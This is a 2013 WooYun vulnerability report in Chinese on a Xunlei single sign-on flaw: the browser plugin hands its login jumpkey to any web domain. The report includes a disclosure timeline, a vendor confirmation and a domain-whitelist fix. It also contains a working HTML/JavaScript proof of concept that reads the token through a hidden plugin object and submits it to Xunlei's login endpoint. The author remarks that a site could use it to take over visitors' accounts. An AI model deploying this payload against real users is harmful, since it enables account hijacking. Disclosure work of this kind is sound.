当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035328

漏洞标题:迅雷单点登陆漏洞

相关厂商:迅雷

漏洞作者: p.z

提交时间:2013-08-26 19:00

修复时间:2013-10-10 19:00

公开时间:2013-10-10 19:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-26: 细节已通知厂商并且等待厂商处理中
2013-08-27: 厂商已经确认,细节仅向厂商公开
2013-09-06: 细节向核心白帽子及相关领域专家公开
2013-09-16: 细节向普通白帽子公开
2013-09-26: 细节向实习白帽子公开
2013-10-10: 细节向公众公开

简要描述:

详细说明:

迅雷单点登陆未对域名进行判断,导致任意的web域都可以调用组件的接口,获取jumpkey,利用该串jumpkey,可以顺利登陆到迅雷.

漏洞证明:

在乌云网下执行js可以取到jumpkey

20130826185511.png


简单poc

<html>
<body>
<button onclick=get()>Get Token</button>
<form action='http://login2.xunlei.com/jumplogin/' method='post' id='form-login'>
<input id='input-token' name='jumpkey' value='' type='text'>
<input type='submit'>
</form>
<script type="text/javascript">
var token = '';
var s = document.createElement("embed");
s.style.visibility = "hidden";
s.type = "application/npxluser_plugin";
s.width = 0;
s.height = 0;
document.body.appendChild(s);

function get(){
token = s.GetJumpKey();
if(token){
document.getElementById('input-token').value = token
}
}
</script>
</body>
</html>


把上述代码稍作修改,加到自己的网站中,如果访客中有正开着迅雷的,可以直接获取这个账户的权限,如果刚好是vip就更好了,去迅雷离线下下葫芦娃什么的.

修复方案:

限定web域名

版权声明:转载请注明来源 p.z@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-27 14:47

厂商回复:

感谢反馈,已经定位到问题了,已经开始加入域白名单。

最新状态:

暂无